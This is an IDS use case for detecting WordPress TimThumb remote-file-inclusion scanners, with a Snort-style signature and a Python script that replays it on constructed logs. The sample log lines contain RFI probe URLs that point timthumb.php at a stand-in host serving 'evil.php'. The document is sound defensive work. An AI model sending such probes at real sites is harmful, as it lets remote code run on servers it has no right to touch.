- Use Case Reference : SUC029
- Use Case Title : WordPress TimThumb RFI Web Scanner/Robot
- Use Case Detection : IDS / HTTP logs
- Attacker Class : Opportunists
- Attack Sophistication : Unsophisticated
- Identified tool(s) : ByroeNet scanners variant
- Source IP(s) : Random
- Source Countries : Random
- Source Port(s) : Random
- Destination Port(s) : 80/TCP, 443/TCP
Possible correlations:
- Related blog posts "WordPress TimThumb Botnets Spreads Status", "WordPress TimThumb Botnet Visualization and Status" and "WordPress TimThumb RFI Vulnerability used as Botnet Recruitment Vector".
Sources:
- Related blog posts "WordPress TimThumb Botnets Spreads Status", "WordPress TimThumb Botnet Visualization and Status" and "WordPress TimThumb RFI Vulnerability used as Botnet Recruitment Vector".
ZATAZ SIG 1010050 triggers when:
- The request URI contains both "wp-content" and "php?src=http" (case-insensitive).
- The traffic comes from any source port on $EXTERNAL_NET towards $HTTP_SERVERS on $HTTP_PORTS, on an established flow to the server.
- The threshold is of type limit, tracked by source IP: the first matching request from a source raises an alert, and further matches from that same source are suppressed for the next 30 seconds.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ZATAZ Timthumb.php - ACCESS - possible WordPress-Attack"; flow:established,to_server; uricontent:"wp-content"; nocase; uricontent:"php?src=http"; nocase; threshold:type limit, count 1, seconds 30, track by_src; classtype:web-application-attack; sid:1010050; priority:3; rev:1;)
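The same detection logic can be replayed offline against web server access logs, which is useful when the IDS was not in place at the time or when you want to validate the signature against your own traffic. The script below is an added example, not part of the ZATAZ use case or its rule set: it parses combined-format access log lines, applies the two case-insensitive URI matches of SIG 1010050, and emulates the "threshold:type limit, count 1, seconds 30, track by_src" behaviour (one alert per source IP, then silence for 30 seconds). The log lines, IP addresses and timestamps are constructed for the example and taken from RFC 5737 documentation ranges.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access log (combined log format); not real traffic.
# Source 203.0.113.5 sends three matching requests at :01, :07 and :45.
# Source 192.0.2.9 sends two requests that each satisfy only one of the
# two URI conditions, so neither should alert.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2011:10:00:01 +0000] "GET /wp-content/themes/example/timthumb.php?src=http://198.51.100.7/evil.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Aug/2011:10:00:07 +0000] "GET /wp-content/themes/other/thumb.php?src=http://198.51.100.7/evil.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Aug/2011:10:00:10 +0000] "GET /wp-content/themes/example/timthumb.php?src=/images/local.jpg HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Aug/2011:10:00:12 +0000] "GET /index.php?src=http://198.51.100.7/x HTTP/1.1" 200 100 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Aug/2011:10:00:45 +0000] "GET /wp-content/plugins/foo/timthumb.php?src=HTTP://198.51.100.7/evil.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, identd, user, [timestamp], "METHOD URI PROTO", ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*"'
)


def parse_line(line):
    """Return {'ip', 'ts', 'uri'} for a combined-format line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "uri": m.group("uri")}


def matches_sig_1010050(uri):
    """Equivalent of the rule's two 'uricontent ... nocase' checks."""
    u = uri.lower()
    return "wp-content" in u and "php?src=http" in u


class LimitThreshold:
    """Emulates 'threshold:type limit, count N, seconds S, track by_src'.

    A window opens on the first event from a source; the first N events in
    that window are allowed, the rest are suppressed until the window
    expires, after which the next event opens a fresh window.
    """

    def __init__(self, count=1, seconds=30):
        self.count = count
        self.window = timedelta(seconds=seconds)
        self.state = {}  # src ip -> (window_start, events_seen_in_window)

    def allow(self, src, ts):
        start, seen = self.state.get(src, (None, 0))
        if start is None or ts - start >= self.window:
            self.state[src] = (ts, 1)
            return True
        seen += 1
        self.state[src] = (start, seen)
        return seen <= self.count


def scan_log(text, threshold=None):
    """Return the alerts SIG 1010050 would raise for the given log text."""
    th = threshold or LimitThreshold(count=1, seconds=30)
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or not matches_sig_1010050(rec["uri"]):
            continue
        if th.allow(rec["ip"], rec["ts"]):
            alerts.append((rec["ip"], rec["ts"].isoformat(), rec["uri"]))
    return alerts


if __name__ == "__main__":
    for ip, ts, uri in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} ZATAZ Timthumb.php - ACCESS - possible WordPress-Attack {uri}")
```

Running it yields two alerts, both for 203.0.113.5: the request at 10:00:01 opens the 30-second window, the one at 10:00:07 is suppressed by the limit, and the one at 10:00:45 opens a new window. The uppercase "HTTP://" in the last request still matches because of nocase. Note that `uricontent` is legacy keyword syntax; current Suricata and Snort 3 express the same match against the normalized URI buffer (http.uri / http_uri), so adapt the rule before loading it on a recent sensor.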